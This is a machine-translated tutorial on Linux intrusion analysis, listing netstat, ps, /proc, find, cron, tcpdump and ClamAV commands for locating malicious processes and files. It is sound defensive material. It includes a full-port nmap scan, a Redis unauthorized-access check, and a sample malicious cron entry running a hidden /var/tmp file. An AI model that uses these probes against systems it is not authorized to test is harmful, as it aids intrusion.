Linux Intrusion Analysis (1) How to Find Malicious Processes and Files?

Others 2022-04-27 20:50:27 views: 0

1. Check CPU memory

top
press the uppercase "P" key to sort the content by CPU usage, and view the processes and PIDs with high usage

2. View the network connection in the netstat host

netstat   -anp
netstat –antlp 
netstat -anltp | more
netstat -tunpl
netstat -antlp | grep -v -e nginx -e "140.205" -e   "192.168.0.3:80 " -e "mem"

netstat -ltpe Use the -ep option to view both process names and user names.
Note - If you use the -n and -e options together, the User column attribute is the user's ID number, not the username.

3.netstat view gateway

netstat -rn

4. Detect the openness of the host port at the periphery of the host

nmap -Pn 1.2.3.4 -p 1-65535
Narrow the scope of intrusion paths based on open ports

5. Is there unauthorized access to redis 6379 port?

(1) The public network uses other machines to execute the command "telnet to analyze the host IP 6379". If the link is successful, there is unauthorized access to Redis
(2) This machine tests unauthorized access to redis: [root@eapple-nfb ~]# redis-cli
127.0.0.1:6379> keys *
(3)ps -ef | grep 6379 Check whether Redis is started by the root user. If so, it is suspected that there is unauthorized access to Redis. It is recommended to start it with a non-root user and set a password.
(4) Redis injects SSH Key
to check whether there are sshkey files such as authorizedkeys in the /root/.ssh directory. If it exists and it is not set by the user, it is suspected that there is unauthorized access to Redis

6. Find the process file location based on the PID

(1) ps -ef | grep 31685
ps -aux | grep zabbix

(2) Using /proc/PID
ll /proc/PID number has a line with the content "exe -> /xxx/xxxx/xxxxx", which is the process directory
ls -l /proc/PID number/exe
file /proc/PID number /exe

(3)lsof -p pid123456

7. Find the file location based on the program name

find / -name infod
find / -name “ *”
find / -name “. *”
find / -name “.. *”

8. Find the location of the associated program file according to the user

(1) find / -user linux | grep -v '/ home / ubuntu'
(2) lsof -u ubuntu

9. View the last modification time of the program

ll /path/program name
ll is equal to ls -l
ls is to display the files in the current directory, "ls -l" is to display the detailed information of the files in the current directory.

ll /usr/sbin/httpd
-rwxr-xr-x 1 root root 523568 Oct 12 2017 /usr/sbin/httpd

10. Process tree pstree to view child processes

yum install psmisc
pstree -p
pstree -p -a

Installation methods on three systems:

#On Mac OS    :brew install   pstree  
#On Fedora/Red Hat/CentOS  :yum install psmisc #using psmisc   package for pstree  
#On Ubuntu/Debian APT  :apt-get install psmisc

11. Automatic startup items

(1) Check the startup items
chkconfig --list or cat /etc/rc.local

(2) Scheduled task script
crontab -l command to view
crontab -l -u oracle to view the scheduled tasks of oracle users

Cron file directory, check /etc/crontab, /etc/cron.d, /etc/cron.daily, cron.hourly/, cron.monthly, cron.weekly/ whether there is a script or program

crontab -l 命令解释
    */30 * * * * /var/tmp/". "/c
    {minute} {hour} {day-of-month} {month} {day-of-week}   {full-path-to-shell-script} 
    o minute: 区间为 0 – 59   
    o hour: 区间为0 – 23   
    o day-of-month: 区间为0   – 31 
    o month: 区间为1 – 12. 1   是1月. 12是12月.   
    o Day-of-week: 区间为0 –   7. 周日可以是0或7.

    "*/30"表示每30个单位,这里代表每30分钟

12. Trojan horse identification website: Weibu Online/virustotal identifies suspicious files and IPs

https://x.threatbook.cn/
www.virustotal.com
http://r.virscan.org

13. Capture packets and analyze traffic

(1) Capture tcp packets
tcpdump -i eth0 -w tel.pcap
(2) Capture http packets
tcpdump -XvvennSs 0 -i eth0 tcp[20:2]=0x4745 or tcp[20:2]=0x4854
Antivirus software clamav ( 1) Source: yum install epel-release

14. Antivirus software clamav

(1) Source:yum install epel-release

(2) Software:yum install clamav-server clamav-data clamav-update clamav-filesystem clamav clamav-scanner-systemd clamav-devel clamav-lib clamav-server-systemd -y

(3) Update virus database: freshclam

  • To scan the home directories of all users use clamscan -r /home
  • To scan all files on your computer and display the scan results of all files, use clamscan -r /
  • To scan all files on your computer and display the scan results of the files in question, use clamscan -r --bell -i /

#Feel that --bell is useless, because /sys/ is scanned, it will report an error of 4000+
LibClamAV Warning: fmap_readpage: pread fail: asked for 4077 bytes @ offset 19, got 0
WARNING: Can't open file /sys/bus/hid /drivers/topseed/bind: Permission denied

Note: clamscan --exclude-dir=/sys/ -i -r /
Due to the particularity of the /sys/ directory, the scan will generate a lot of errors, just skip this folder.
-i means to report only infected files, -r means that subfolders should also be scanned, / is the root directory

15. The tool chkrootkit checks for intrusions

https://www.lvtao.net/server/chkrootkit.html

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=325851894&siteId=291194637
Recommended
Ranking
Linux关机和重启详解(shutdown、halt、poweroff、reboot、init)
Netty work notes 0007---NIO's three core component relationships
Knife4j tutorial
2021.10.29,内容:什么时候用接口和抽象类
How to solve the problem that changing the memory frequency causes the computer to become unusable?
SpringMVC Tutorial - Controller
linux learning skills -Linux 25 transport Vega paid special privileges and facl extension
Financial quarterly report evaluation report data automatic generation 1.0
Agile Development Series - The Values of Agile Development
scrapy achieve browsercookie Middleware
Daily
More
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)

Code World

© 2018 codetd.com